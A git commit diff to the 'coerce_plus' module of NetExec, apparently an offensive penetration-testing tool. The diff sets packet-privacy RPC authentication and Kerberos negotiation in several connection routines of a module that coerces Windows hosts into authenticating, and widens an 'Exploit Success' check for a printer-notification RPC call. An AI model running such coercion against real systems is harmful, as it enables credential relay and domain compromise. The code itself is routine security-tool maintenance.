Adding rpc auth level

NeffIsBack · NeffIsBack · commit 6afb8bba0b9f · 2024-07-28T12:46:59.000-04:00
diff --git a/nxc/modules/coerce_plus.py b/nxc/modules/coerce_plus.py
@@ -1,6 +1,7 @@
 from impacket.dcerpc.v5 import transport, rprn, even
 from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray, NDRPOINTERNULL
 from impacket.dcerpc.v5.dtypes import LPBYTE, USHORT, LPWSTR, DWORD, ULONG, NULL, WSTR, LONG, BOOL, PCHAR, RPC_SID
+from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
 
 from impacket.uuid import uuidtup_to_bin
 
@@ -236,6 +237,9 @@ def connect(self, username, password, domain, lmhash, nthash, aesKey, target, do
 
         rpctransport.setRemoteHost(target)
         dce = rpctransport.get_dce_rpc()
+        if doKerberos:
+            dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
         self.context.log.debug("Connecting to {}".format(binding_params[pipe]["stringBinding"]))
         try:
             dce.connect()
@@ -347,10 +351,12 @@ def connect(self, username, password, domain, lmhash, nthash, aesKey, target, do
 
         if doKerberos:
             rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
-        # if target:
 
         rpctransport.setRemoteHost(target)
         dce = rpctransport.get_dce_rpc()
+        if doKerberos:
+            dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
         self.context.log.debug("Connecting to {}".format(binding_params[pipe]["stringBinding"]))
         try:
             dce.connect()
@@ -577,6 +583,9 @@ def connect(self, username, password, domain, lmhash, nthash, aesKey, target, do
 
         rpctransport.setRemoteHost(target)
         dce = rpctransport.get_dce_rpc()
+        if doKerberos:
+            dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
         self.context.log.debug("Connecting to {}".format(binding_params[pipe]["stringBinding"]))
         try:
             dce.connect()
@@ -809,6 +818,9 @@ def connect(self, username, password, domain, lmhash, nthash, aesKey, target, do
 
         rpctransport.setRemoteHost(target)
         dce = rpctransport.get_dce_rpc()
+        if doKerberos:
+            dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
         self.context.log.debug("Connecting to {}".format(binding_params[pipe]["stringBinding"]))
         try:
             dce.connect()
@@ -849,7 +861,7 @@ def exploit(self, dce, listener, target, always_continue, pipe):
             request["dwPrinterLocal"] = 0
             dce.request(request)
         except Exception as e:
-            if str(e).find("rpc_s_access_denied") >= 0:
+            if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("RPC_S_SERVER_UNAVAILABLE") >= 0:
                 self.context.log.debug("RpcRemoteFindFirstPrinterChangeNotificationEx Success")
                 self.context.log.highlight(f"Exploit Success, {pipe}\\RpcRemoteFindFirstPrinterChangeNotificationEx")
                 if not always_continue:
@@ -920,6 +932,9 @@ def connect(self, username, password, domain, lmhash, nthash, aesKey, target, do
 
         rpctransport.setRemoteHost(target)
         dce = rpctransport.get_dce_rpc()
+        if doKerberos:
+            dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
         self.context.log.debug("Connecting to {}".format(binding_params[pipe]["stringBinding"]))
         try:
             dce.connect()
